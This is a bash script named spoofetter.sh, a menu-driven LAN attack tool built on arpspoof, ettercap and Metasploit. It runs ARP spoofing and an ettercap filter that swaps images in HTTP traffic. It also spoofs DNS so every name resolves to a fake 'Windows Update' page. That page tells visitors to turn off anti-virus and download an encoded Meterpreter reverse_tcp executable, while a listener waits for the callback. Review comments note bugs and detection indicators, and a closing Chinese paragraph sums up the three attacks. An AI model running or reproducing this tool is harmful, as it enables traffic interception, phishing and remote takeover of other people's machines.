#!/bin/bash
#Author: Qingzheng
#2012-11-11
#spoofetter.sh Version 0.1
#Email:[email protected]
function Usage(){
# Print the four-line coloured banner. The colour variables ($red, $purple,
# $white) are globals assigned in Main; if unset they expand to nothing.
local border="$red####################################################$white"
local row
for row in \
"$border" \
"$red# ${purple}spoofetter.sh $red#$white" \
"$red# ${purple}Author:Qingzheng $red#$white" \
"$border"
do
echo -e "$row"
done
}
# Prepare the machine running the script: enable IPv4 forwarding, edit
# /etc/etter.conf and start the local apache2 service.
# Globals: blue, white (read, for coloured output).
# NOTE(review): every step writes to system locations (/proc/sys, /etc, an init
# script), so this presumably needs root. Nothing in the visible script reverts
# these changes, so they remain on the host afterwards as forensic artifacts.
function Ettercap_config(){
echo -e "[$blue>$white] Start IPv4 Forward"
# Turns the host into a router for the traffic it intercepts.
echo '1' >/proc/sys/net/ipv4/ip_forward
echo -e "[$blue>$white] Change etter.conf"
# NOTE(review): `sed -i` edits the file named on its command line and ignores
# stdin, so the grep output is discarded and the substitution removes every
# '#' character in /etc/etter.conf, not only on the "iptables -t" lines. The
# edit is applied again on each call (Main calls this once per menu pass).
grep "iptables -t" /etc/etter.conf | sed -i 's/#//g' /etc/etter.conf
echo -e "[$blue>$white] Start apache"
# Output and errors are discarded, so a failed start goes unnoticed here.
/etc/init.d/apache2 start &>/dev/null
echo -e "[$blue>$white] Ettercap configure DONE!"
}
# Build a Windows executable payload under the web root, write a Metasploit
# resource file, open msfconsole in an xterm, then show a countdown spinner.
# Globals: localhost (read, used as LHOST), blue, white (read).
# Detection notes taken from the values hard-coded below: the file name
# Windows-KB655723-x86-ENU.exe served over HTTP from a LAN address, and
# outbound TCP connections from a workstation to port 3421, are both
# indicators of this script being in use.
function Listening(){
echo -e "[$blue>$white] Make payload /var/www/Windows-KB655723-x86-ENU.exe"
# Reverse-TCP Meterpreter payload, encoded 10 times with x86/shikata_ga_nai and
# written as an .exe whose name imitates a Windows update package.
msfpayload windows/meterpreter/reverse_tcp LHOST=$localhost LPORT=3421 R | msfencode -t exe -e x86/shikata_ga_nai -c 10 -o /var/www/Windows-KB655723-x86-ENU.exe
# Resource script for the matching handler. The path is relative to the current
# working directory; ./tmp is not created anywhere in the visible script.
echo -en "use exploit/multi/handler\nset PAYLOAD windows/meterpreter/reverse_tcp\nset LHOST $localhost\nset LPORT 3421\nexploit\n" >$(pwd)/tmp/listening.rc
echo -e "[$blue>$white] Start Listening..."
# Handler runs in its own terminal in the background; -hold keeps the window
# open after msfconsole exits.
xterm -hold -geometry 80x15+0+0 -e "msfconsole -r $(pwd)/tmp/listening.rc" &
echo -en "[$blue+$white] Time [ "
# Countdown: 15 outer steps, each 25 x 4 sleeps of 0.01 s (about 1 s per step),
# presumably to give msfconsole time to start before the caller continues.
t="15"
for h in `seq $t`;do
let p=$t-$h
echo -n "="
for i in `seq 25`; do
# The spinner character plus the remaining count are printed and then erased
# with backspaces: three for a two-digit count, two for a one-digit count.
if [ "$p" -ge "10" ]; then
sleep 0.01
echo -en "|$p\b\b\b"
sleep 0.01
echo -en "/$p\b\b\b"
sleep 0.01
echo -en "-$p\b\b\b"
sleep 0.01
echo -en "\\\\$p\b\b\b"
else
sleep 0.01
echo -en "|$p\b\b"
sleep 0.01
echo -en "/$p\b\b"
sleep 0.01
echo -en "-$p\b\b"
sleep 0.01
echo -en "\\\\$p\b\b"
fi
done
done
echo " ]"
}
# Start 21 arpspoof processes against the gateway: 20 in the background with
# output discarded, then one in the foreground that blocks until interrupted.
# Globals: interface, gateway, dsthost (read), blue, white (read).
# With `-t $gateway $dsthost` the forged ARP replies are sent to the gateway
# and claim the selected host's IP address for this machine.
# Detection/mitigation: a sudden change of the MAC bound to an existing IP and
# a high rate of unsolicited ARP replies are what ARP monitoring (e.g. arpwatch)
# and switch-level dynamic ARP inspection are designed to catch.
# NOTE(review): the background processes are not tracked and nothing in this
# function stops them, so they presumably keep running after the foreground
# instance is interrupted.
function ARPSpoofAttack(){
for ((i=0;i<=19;i++));do
echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
arpspoof -i $interface -t $gateway $dsthost &>/dev/null &
done
# i is 20 here, so this line reports the 21st (foreground) process.
echo -e "[$blue>$white] Run ARP_Spoof_Attack...processes $i"
arpspoof -i $interface -t $gateway $dsthost
}
# Copy a replacement image into the web root, generate and compile an ettercap
# content filter that rewrites image references in HTTP responses, then run
# ettercap with that filter against the selected host.
# Globals: localhost, interface, dsthost (read), blue, white (read).
# Exits the whole script if ./tmp/replancebrowseimg.jpg does not exist.
# Defensive note: both filter rules match only TCP port 80, i.e. cleartext
# HTTP; traffic carried over TLS is not matched by these rules, which is one
# reason to serve and require HTTPS.
function ReplanceBrowseImg(){
echo -e "[$blue>$white] Copy $(pwd) /var/www"
if [ -e $(pwd)/tmp/replancebrowseimg.jpg ]; then
cp -rf $(pwd)/tmp/replancebrowseimg.jpg /var/www
else
echo -e "[$blue>$white] No founding $(pwd)/tmp/replancebrowseimg.jpg"
# Bare `exit` terminates the script with the status of the preceding echo.
exit
fi
echo -e "[$blue>$white] Create file replancebrowseimg.src!"
# The quoted text below is the filter source written to ./tmp. The first rule
# renames the Accept-Encoding request header; the second rewrites "img src="
# in responses to point at http://$localhost/replancebrowseimg.jpg.
echo "# This is ettercap script
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, \"Accept-Encoding\")) {
replace(\"Accept-Encoding\", \"Accept-Mousecat\");
msg(\"zapped Accept-Encoding!\n\");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(\"img src=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");
replace(\"IMG SRC=\", \"img src=\"http://$localhost/replancebrowseimg.jpg\" \");
msg(\"Filter Ran.\n\");
}" >$(pwd)/tmp/replancebrowseimg.src
# Compile the filter; only the last five non-empty lines of etterfilter's
# output are shown, each prefixed with a green "[>]" marker. The compiler's
# exit status is not checked.
echo -e "`etterfilter $(pwd)/tmp/replancebrowseimg.src -o $(pwd)/tmp/replancebrowseimg.ef | grep -v "^$" | tail -n5 | sed 's/^/[\\\e[01;32m>\\\e[00m]/g'`"
echo -e "[$blue>$white] Compile replancebrowseimg.src DONE!"
echo -e "[$blue>$white] Img path http://$localhost/replancebrowseimg.jpg"
echo -e "[$blue>$white] Run Replance_Browse_Img ..."
# Runs in the foreground (text mode, quiet) with ARP poisoning of the selected
# host; every output line is prefixed with "[+] ".
ettercap -i $interface -T -q -F $(pwd)/tmp/replancebrowseimg.ef -M arp:remote // /$dsthost/ | sed 's/^/[+] /g'
}
# Overwrite the local web root's index.html with a fake "Windows Update" page,
# call Listening to build the payload and start the handler, replace ettercap's
# etter.dns with a wildcard record pointing at this machine, and launch ettercap
# with the dns_spoof plugin against the selected host.
# Globals: localhost, interface, dsthost (read), blue, white (read).
# Defensive notes: the page below tells the visitor to turn off anti-virus
# software and offers /Windows-KB655723-x86-ENU.exe for download; a site that
# asks for either is a strong phishing signal for user-awareness training. The
# page is only written to /var/www, so it is presumably served over plain HTTP.
# Forensic note: /var/www/index.html and etter.dns are overwritten on the host
# running the script; the original etter.dns is kept once as etter.dns.old and
# is never restored by the visible code.
function DNSSpoofAttack(){
echo "<!-- evil html -->
<!DOCTYPE html PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/1999/REC-html1401-19991224/strict.dtd\">
<html>
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />
<title>Windows Update</title>
<style type=\"text/css\">
.style2{
font-family:Arial, Helvetica, scans-serif;
font-weight:bold;
font-size:14px;
color:#999999;
}
.style3{
font-family:Arial, Helvetica, scans-serif;
font-weight:bold;
font-size:10px;
color:#999999;
}
</style>
</head>
<body>
<script type=\"text/javascript\">
setInterval(\"webjx.innerHTML=new Date().toLocaleString();\",1000);
document.write(\"Browser name: \"+navigator.appName+\"<hr />\")
</script>
<p align=\"center\" class=\"style2\">High-risk vulnerabilities detected browser<br />Tip: turn off anti-virus software
</p>
<p align=\"center\">
<input align=\"center\" type=\"button\" name=\"Button\" value=\"Download Update\" onClick=\"window.open('/Windows-KB655723-x86-ENU.exe','download'); return false;\"></p><br />
<div align=\"center\" id=\"webjx\" class=\"style3\"></div>
</body>
</html>
" >/var/www/index.html
# Builds the executable the page links to and starts the handler (about 15 s).
Listening
# Back up etter.dns only if no backup exists yet, so a second run does not
# replace the saved original with the already modified file.
if [ ! -e "/usr/local/share/ettercap/etter.dns.old" ]; then
if [ -e /usr/local/share/ettercap/etter.dns ]; then
mv /usr/local/share/ettercap/etter.dns /usr/local/share/ettercap/etter.dns.old
echo -e "[$blue>$white] Backup etter.dns.old"
else
echo -e "[$blue>$white] No founding /usr/local/share/ettercap/etter.dns"
echo -e "[$blue>$white] Create new file /usr/local/share/ettercap/etter.dns"
touch /usr/local/share/ettercap/etter.dns
fi
else
echo -e "[$blue>$white] Alredy backup etter.dns.old"
fi
echo -e "[$blue>$white] Change etter.dns"
# Single wildcard A record: every name is answered with this machine's address.
echo "* A $localhost" >/usr/local/share/ettercap/etter.dns
echo -e "[$blue>$white] Run DNS_Spoof_Attack..."
# Runs in a separate terminal in the background, so control returns to the menu
# loop in Main while the spoofing continues.
xterm -geometry 80x15+0+230 -e "ettercap -i $interface -T -q -P dns_spoof -M arp:remote // /$dsthost/" &
}
#################################################################
######### Main ################################
#################################################################
# Interactive menu loop: choose an interface, discover hosts on the local /24,
# choose a target host and an attack, run Ettercap_config, then dispatch to the
# selected function. The loop never ends on its own.
# Globals written (none is declared local, so the other functions read them):
# blue, red, green, purple, white, underline, interface, localhost, gateway,
# dsthost, plus scratch variables.
# Detection note: each pass performs an nmap host-discovery sweep of the /24,
# which is visible on the network as a burst of probes to every address.
function Main(){
blue="\e[01;34m"
red="\e[00;31m"
green="\e[00;32m"
purple="\e[00;35m"
white="\e[00m"
underline="\\033[4m"
# `[ True ]` tests a non-empty string, so the condition is always true.
while [ True ]; do
Usage
# Numbered list "[n]: name" of the non-loopback interfaces, parsed from ifconfig
# "Link encap" lines. NOTE(review): this relies on the older net-tools output
# format; `grep -v "lo"` also drops any interface whose line contains "lo".
allinterface=`ifconfig | grep "Link encap" | awk '{print $1}' | grep -v "lo" | grep -n "" | sed 's/^/[/g' | sed 's/:/]: /g'`
echo -e "$purple${allinterface}$white"
echo -en "${underline}Interface$white:$blue>>$white "
# NOTE(review): the typed value is not validated and is placed into a grep
# pattern below; an empty or unmatched entry leaves $interface empty.
read numinterface
interface=`echo "$allinterface" | grep "\[$numinterface\]" | cut -d' ' -f2`
localhost=`ifconfig $interface | grep "inet addr" | grep -v "127.0.0.1" | cut -d':' -f2 | awk '{print $1}'`
# Gateway column of routes flagged "UG"; more than one such route would give
# a multi-line value (uniq only collapses adjacent duplicates).
gateway=`route -n | grep "UG" | awk '{print $2}' | uniq`
echo -e "[$blue>$white] Local IP: $green${localhost}$white"
echo -e "[$blue>$white] Gateway: $green${gateway}$white"
echo -e "[$blue>$white] Online Host!!"
# Host discovery only (-sn), no DNS resolution (-n). A /24 is assumed whatever
# the interface's real netmask is.
a=`nmap -T4 -sn -n $localhost/24`
# Numbered list of discovered addresses, excluding this machine's own address.
scanhost=`echo "$a" | grep "Nmap scan" | cut -d' ' -f5 | grep -v "$localhost" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
# Fields 3-9 of each "MAC Address:" line, concatenated without separators.
b=`echo "$a" | grep "MAC Address:" | awk 'FS=" " {print $3 $4 $5 $6 $7 $8 $9}'`
c=`echo "$scanhost" | wc -l`
# Print host line i next to MAC line i; this assumes both lists are in the
# same order and have the same length.
for ((i=1;i<$c+1;i++));do
# NOTE(review): `$i%2==1` is a single non-empty word, so this test is always
# true and the else branch never runs; both branches print the same text.
if [ $i%2==1 ]; then
u=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
echo -e "$purple${u}$white"
else
v=$(echo -en "`echo "$scanhost" | sed -n ${i}p`\t" && echo "$b" | sed -n ${i}p)
echo -e "$purple${v}$white"
fi
done
echo -en "${underline}Dstination host$white:$blue>>$white "
read numdsthost
dsthost=`echo "$scanhost" | grep "\[$numdsthost\]" | cut -d' ' -f2`
Attoption=`echo -e "ARP_Spoof_Attack\nReplance_Browse_Img\nDNS_Spoof_Attack" | grep -n "" | sed -e 's/^/[/g' -e 's/:/]: /g'`
echo -e "${purple}$Attoption${white}"
echo -en "${underline}Attack Option${white}:$blue>>$white "
read numattack
attackoption=`echo "$Attoption" | grep "\[$numattack\]" | cut -d' ' -f2`
# Runs on every pass, before the choice is checked, so the host configuration
# is changed even when the selection matches none of the cases below.
Ettercap_config
# No default arm: an unrecognised selection falls through and the menu repeats.
case $attackoption in
"ARP_Spoof_Attack")
ARPSpoofAttack
;;
"Replance_Browse_Img")
ReplanceBrowseImg
;;
"DNS_Spoof_Attack")
DNSSpoofAttack
;;
esac
echo
done
}
# Entry point: start the interactive menu loop; no command-line arguments are passed.
Main
這個腳本有三個功能:第一個是 ARP 欺騙斷網攻擊;第二個是照片替換,不過經測試這個替換效果不好,過濾規則也沒有寫好;最後一個是 ARP DNS 欺騙,並僞造成升級網頁,誘騙用戶下載並雙擊 exe 文件,反彈一個 shell。